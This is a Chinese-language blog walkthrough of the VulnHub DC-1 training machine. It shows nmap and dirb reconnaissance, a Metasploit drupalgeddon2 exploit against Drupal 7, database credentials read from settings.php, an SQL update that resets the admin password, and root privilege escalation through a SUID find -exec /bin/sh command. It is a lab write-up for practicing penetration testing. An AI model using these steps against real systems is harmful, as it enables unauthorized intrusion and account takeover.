<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="saulGoodman">





<title>VulnHub通关日记-DC_1-Walkthrough | 渗透攻击红队-专注于渗透红队攻击</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 5.4.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">saulGoodman</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">saulGoodman</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">VulnHub通关日记-DC_1-Walkthrough</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">saulGoodman</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">February 18, 2020&nbsp;&nbsp;11:51:19</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Vulnhub/">Vulnhub</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=29794354&auto=1&height=66"></iframe>

<h2 id="靶机简介"><a href="#靶机简介" class="headerlink" title="靶机简介"></a>靶机简介</h2><p>DC系列的靶机是一个专门构建的易受攻击的实验室，总共有九个！目的是获得渗透测试领域的经验。<br>它的设计初学者是一个挑战，但是它的难易程度取决于您的技能和知识以及学习能力。<br>要成功完成此挑战，您需要具备Linux技能，熟悉Linux命令行以及具有基本渗透测试工具的经验，例如可以在Kali Linux或Parrot Security OS上找到的工具。<br>有多种获得根的方法，但是，我包括了一些标志，这些标志包含了初学者的线索。<br>总共有五个Flag，但是最终目标是在root的主目录中找到并读取该标志。您甚至不需要成为root用户即可执行此操作，但是，您将需要root特权。<br>根据您的技能水平，您可能可以跳过查找大多数这些标志并直接获得root资格。</p>
<h2 id="学习到的知识"><a href="#学习到的知识" class="headerlink" title="学习到的知识"></a>学习到的知识</h2><p><code>Drupal 7</code> CMS的<code>RCE</code>(Metasploit)</p>
<p><code>Drupal 7</code> 的 <code>Mysql</code> 写入 <code>SQL</code> 添加后台管理员账号</p>
<p><code>find</code> 命令 <code>SUID</code> 权限提升</p>
<h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><p>拿到靶机后先对它端口进行扫描：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -A -p- -T4 192.168.1.142</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1063.png" alt="图片"></p>
<p>扫描出来结果发现它开放了 <code>22</code>（ssh）、<code>80</code>（http）、<code>111</code>（nfs共享）。</p>
<p>其中 <code>http</code> 的 <code>web</code> 使用的 <code>CMS</code> 是 <code>Drupal 7</code>。我们先从 <code>web</code> 下手吧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.142</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1064.png" alt="图片"></p>
<p>在 <code>web</code> 页面上没有啥东西，尝试了一下弱口令无果，还是先对它进行扫描目录文件吧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirb http://192.168.1.142</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1065.png" alt="图片"></p>
<p>扫描出来后发现有 <code>robots.txt</code> 文件，打开后是这样的：</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1066.png" alt="图片"></p>
<p>我在翻了一些文件没有得到可利用的信息，只是知道它的版本好像是 <code>7.x</code> 版本。随后我搜索了一下有关于这个 CMS 的漏洞，看看能不能捡个漏：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit Drupal</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1067.png" alt="图片"></p>
<p>从上图可知，它漏洞还是蛮多的，刚好有一个 <code>RCE</code> 可以用 <code>Metasploit</code> 来进行利用！随后我打开 MSF 搜索了一下它的利用模块，我使用的是这个模块（前面几个看了不能用）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/unix/webapp/drupal_drupalgeddon2</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1068.png" alt="图片"></p>
<p>之后设置 <code>rhosts</code> 开始攻击 <code>exploit</code> 得到一枚 <code>shell</code>：</p>
<p>看了看只是一个普通的网站权限，系统是 <code>Linux</code> 的 <code>Debian</code> 。</p>
<p>我先是用 <code>MSF</code> 的提权辅助模块来尝试看看能不能运气爆棚的鸡蛋里挑骨头找到一个提权模块：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post/multi/recon/local_exploit_suggester</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1069.png" alt="图片"></p>
<p>额，没有找到可以用来提权的模块，那么就算了～我还是先进它 <code>shell</code> 里面看看吧，只有打入敌人内部才能取敌将首级！进入到 <code>shell</code> 后先用 <code>python</code> 来得到一枚 <code>sh</code> 吧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/sh&quot;)</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1070.png" alt="图片"></p>
<h2 id="Flag1"><a href="#Flag1" class="headerlink" title="Flag1"></a>Flag1</h2><p>我所在的目录是网站的绝对路径 <code>/var/www</code>，下面有一个 <code>flag1.txt</code> 文件，<code>cat</code> 查看文件后拿到第一个 <code>flag</code>，里面有作者给我们的提示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Every good CMS needs a config file - and so do you.</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1071.png" alt="图片"></p>
<p>翻译过来大概就是让我们找 <code>CMS</code> 的配置文件，这也是我们获取下一个<code>flag</code>的线索之一！</p>
<h2 id="Flag2"><a href="#Flag2" class="headerlink" title="Flag2"></a>Flag2</h2><p>得到线索后，我疯狂翻网站的目录找到了它的配置文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/www/sites/default/settings.php</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1072.png" alt="图片"></p>
<p>查看文件后我们得到了<code>Flag2</code>，又得到了一个新线索：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">/**</span><br><span class="line"> *</span><br><span class="line"> * flag2</span><br><span class="line"> * Brute force and dictionary attacks aren&#x27;t the</span><br><span class="line"> * only ways to gain access (and you WILL need access).</span><br><span class="line"> * What can you do with these credentials?</span><br><span class="line"> *</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">$databases = array (</span><br><span class="line">  &#x27;default&#x27; =&gt; </span><br><span class="line">  array (</span><br><span class="line">    &#x27;default&#x27; =&gt; </span><br><span class="line">    array (</span><br><span class="line">      &#x27;database&#x27; =&gt; &#x27;drupaldb&#x27;,</span><br><span class="line">      &#x27;username&#x27; =&gt; &#x27;dbuser&#x27;,</span><br><span class="line">      &#x27;password&#x27; =&gt; &#x27;R0ck3t&#x27;,</span><br><span class="line">      &#x27;host&#x27; =&gt; &#x27;localhost&#x27;,</span><br><span class="line">      &#x27;port&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">      &#x27;driver&#x27; =&gt; &#x27;mysql&#x27;,</span><br><span class="line">      &#x27;prefix&#x27; =&gt; &#x27;&#x27;,</span><br><span class="line">    ),</span><br><span class="line">  ),</span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1073.png" alt="图片"></p>
<p>翻译过来大概的意思是告诉我们暴力用字典破解不是一个有效的方式，既然得到了配置文件，你能用这个配置文件来做什么？</p>
<h2 id="Flag3"><a href="#Flag3" class="headerlink" title="Flag3"></a>Flag3</h2><p>很明显了，这段提示下面就是一个数据库的配置信息，作者可能是要让我们进入到 <code>Mysql</code> 里面！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">数据库名：&#x27;drupaldb&#x27;,</span><br><span class="line">用户名：&#x27;dbuser&#x27;,</span><br><span class="line">密码：&#x27;R0ck3t&#x27;,</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1074.png" alt="图片"></p>
<p>成功登陆到它的 Mysql 里面，我找到了一些账号和密码：</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1075.png" alt="图片"></p>
<p>但是这玩意密码有哈希加密了的，我又连续查询了好多表才发现了 <code>Flag3</code> 的一丝线索：</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1076.png" alt="图片"></p>
<p>它这里的 <code>title</code> 里有 <code>flag3</code>，但是里面没有提示信息！既然是在 <code>title</code> 上有 <code>flag3</code> 的线索，那么有可能是在网站的里面，也就是网站的后台里！</p>
<p>接着我重新写入了一段 <code>SQL</code> 语句，把管理员的密码给重置了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">具体可以看这篇文章：https://www.isfirst.net/drupal/drupal-reset-password</span><br><span class="line"></span><br><span class="line">update users set pass=&#x27;$S$DFLfuzfO9WDKAJcUHnNmhS9NwOD6MRj3pk00qEl4O7iNBD2X4n3v&#x27; where name=&#x27;admin&#x27;;</span><br><span class="line"># 这段 sql 语句的意思是把 admin 的密码重置为 drupal ，因为它的 pass 加密是 password-hash.sh ，所以我们直接给他替换掉！</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1077.png" alt="图片"></p>
<p>写入成功后，我们来到网站的登陆页面：<code>http://192.168.1.142/user</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin：drupal</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1078.png" alt="图片"></p>
<p>登陆进去后我们得到了 <code>Flag3！</code> 这个时候我们又得到了一个新线索：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Special PERMS will help FIND the passwd - but you&#x27;ll need to -exec that command to work out how to get what&#x27;s in the shadow.</span><br></pre></td></tr></table></figure>

<p>大概的意思是让我们通过 <code>-exec</code> 命令来得到密码啥的！</p>
<h2 id="Flag4"><a href="#Flag4" class="headerlink" title="Flag4"></a>Flag4</h2><p>既然提示说要我们通过命令来得到密码，那么我首先是查看了 <code>passwd</code> 文件，发现了有关 <code>flag4</code> 的线索：</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1079.png" alt="图片"></p>
<p>有一个 <code>flag4</code> 的用户，随后我来到了 <code>flag4</code> 的目录发现了 <code>flag4.txt</code> 文件！（saul文件是我之前玩靶机留下的，大家当作没有就好了）</p>
<p>打开之后呢得到了最后一个线索：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Can you use this same method to find or access the flag in root?</span><br><span class="line">Probably. But perhaps it&#x27;s not that easy.  Or maybe it is?</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1080.png" alt="图片"></p>
<p>翻译过来的意思大概是让我们以相同的方式来得到 <code>root</code> 目录下的 <code>flag</code> 。</p>
<h2 id="Flag5"><a href="#Flag5" class="headerlink" title="Flag5"></a>Flag5</h2><p>得到线索后我习惯性的 <code>sudo -l</code> 查看有没有什么命令可以让我提权的，但是它没有 <code>sudo</code> 这个命令：</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1081.png" alt="图片"></p>
<p>额，有点打脑壳！借用<code>朝阳冬泳怪鸽</code>的话：我们遇到什么困难也不要怕，微笑着面对它！消除恐惧的最好办法就是面对恐惧！坚持，才是胜利。加油！奥利给！</p>
<p>别慌，抽根烟再好好想想！我又接着查看下，看它有没有 <code>root</code> 权限的文件，但是没有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -4000 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1082.png" alt="图片"></p>
<p>接着我又查看了有没有 <code>root</code> 权限的 <code>SUID</code> 命令发现了这些：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -type f -perm -u=s 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1083.png" alt="图片"></p>
<p>其中有一个命令我之前提权的时候用过，就是 <code>find</code> 命令！刚好之前在拿到 <code>Flag3</code> 的时候它提示了 <code>-exec</code> 命令！这是一个参数，搭配 <code>find</code> 查找命令使用可以调用命令来去执行！</p>
<p>我首先是想在 <code>flag4</code> 目录创建个文件，但是失败了！但是没关系！</p>
<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1084.png" alt="图片"></p>
<p>由于当前目录下有一个 <code>flag4.txt</code> 文件我们就直接使用 <code>find</code> 查看当前权限，请忽略上面那条命令！（当时的思路是创建一个文件，然后使用 find 命令来查找这个文件然后执行命令的）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find flag4.txt -exec &quot;whoami&quot; \;</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1085.png" alt="图片"></p>
<p>可以看到，我们的权限是 <code>root</code> 了，我们直接提权把：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find flag4.txt -exec &quot;/bin/sh&quot; \;</span><br><span class="line"># 这段命令的意思就是先使用 find 命令查找 flag4.txt 文件，然后使用它的参数 -exec 来执行命令 /bin/sh ，这样我们就能获取到 root 权限了！</span><br></pre></td></tr></table></figure>

<p><img src="https://liuwx-1259310507.cos.ap-chengdu.myqcloud.com/img/1086.png" alt="图片"></p>
<p>最后也是在 <code>root</code> 目录下拿到了最后的 <code>Flag</code> 文件！</p>
<h2 id="公众号"><a href="#公众号" class="headerlink" title="公众号"></a>公众号</h2><p><strong>若有好的建议和合作可以通过公众号与我联系！</strong><br>微信公众号：<code>渗透攻击红队</code><br><img src="https://blog-1259310507.cos.ap-chengdu.myqcloud.com/logo/vxgzh.jpeg"></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>saulGoodman</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2020/02/18/Vulnhub-DC-1/">http://example.com/2020/02/18/Vulnhub-DC-1/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"># 渗透测试</a>
                    
                        <a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/"># 权限提升</a>
                    
                        <a href="/tags/CTF/"># CTF</a>
                    
                        <a href="/tags/Vulnhub/"># Vulnhub</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/02/18/Red-Teaming-CFS/">CFS靶机实战演练-从外网杀进三层内网，横向渗透拿到Flag</a>
            
            
            <a class="next" rel="next" href="/2020/02/15/Vulnhub-EnuBox-Mattermost/">VulnHub通关日记-EnuBox_Mattermost，逆向分析文件获取Flag</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© saulGoodman | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
